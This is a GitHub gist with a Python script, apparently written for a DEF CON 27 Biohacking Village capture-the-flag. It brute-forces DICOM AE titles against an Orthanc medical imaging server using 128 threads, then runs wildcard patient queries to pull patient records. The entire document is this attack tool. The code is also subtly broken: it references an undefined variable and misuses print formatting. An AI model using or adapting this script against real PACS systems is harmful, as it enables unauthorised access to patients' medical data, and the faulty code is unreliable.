Skip to content

Instantly share code, notes, and snippets.

@itsmenaga
Forked from ianatha/dicom-bruteforce.py
Created April 29, 2020 18:11
Show Gist options
  • Save itsmenaga/df4aa8ddb2127049e065f1dfff759f83 to your computer and use it in GitHub Desktop.
Save itsmenaga/df4aa8ddb2127049e065f1dfff759f83 to your computer and use it in GitHub Desktop.
DEFCON 27 BHV CTF
#/usr/bin/env python3
# run me with ulimits -n 2048
import itertools
import string
from pydicom.dataset import Dataset
from pynetdicom import AE, QueryRetrievePresentationContexts
from pynetdicom.sop_class import PatientRootQueryRetrieveInformationModelFind
import sys
import time
import concurrent.futures
import random
def chunks(iterable, max=10):
first = next(iterable)
def head_inner():
yield first
for cnt, el in enumerate(iterable):
yield el
if cnt + 1 >= max:
break
return head_inner()
def ae_title_generator():
alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
for index in range(2, 10):
passwords = (itertools.product(alphabet, repeat = index))
for i in passwords:
yield "".join(i)
def attempt_connection(client_ae, server_ae, host, port):
ae = AE(ae_title=client_ae)
ae.requested_contexts = QueryRetrievePresentationContexts
ae.add_requested_context(PatientRootQueryRetrieveInformationModelFind)
assoc = ae.associate(host, port, ae_title=server_ae)
if assoc.is_established:
print("trying %s", title)
ds = Dataset()
ds.QueryRetrieveLevel = 'PATIENT'
ds.PatientName = '**'
ds.ReferringPhysicianName = '**'
responses = assoc.send_c_find(ds, PatientRootQueryRetrieveInformationModelFind)
for (status, identifier) in responses:
if status:
print("Success with %s ", title)
print("%s\t%s", status, identifier)
else:
print("fail %s", title)
assoc.release()
else:
print("bad server")
return "bad_server_ae"
def worker(pw, addr, port):
print(pw)
return attempt_connection(pw, b'ORTHANC2', addr, port)
def main():
addr = '10.0.0.160'
port = 104
timeout = 30
gen = ae_title_generator()
with concurrent.futures.ThreadPoolExecutor(max_workers=128) as executor:
while True:
future_tasks = {executor.submit(worker, pw, addr, port): pw for pw in chunks(gen, 128)}
try:
for future in concurrent.futures.as_completed(future_tasks, timeout=timeout):
result = future.result()
if result:
print(result)
except Exception as e:
print(e)
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment